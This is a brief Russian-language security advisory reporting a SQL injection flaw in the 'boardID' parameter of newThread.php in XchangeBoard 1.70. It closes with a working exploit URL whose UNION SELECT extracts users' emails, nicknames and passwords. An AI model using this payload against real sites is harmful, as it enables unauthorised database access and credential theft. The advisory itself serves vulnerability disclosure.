Программа: XchangeBoard 1.70
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «boardID» сценарием newThread.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/path/newThread.php? boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,
substring(password,1,100)),email,email,email%20from%20user/*
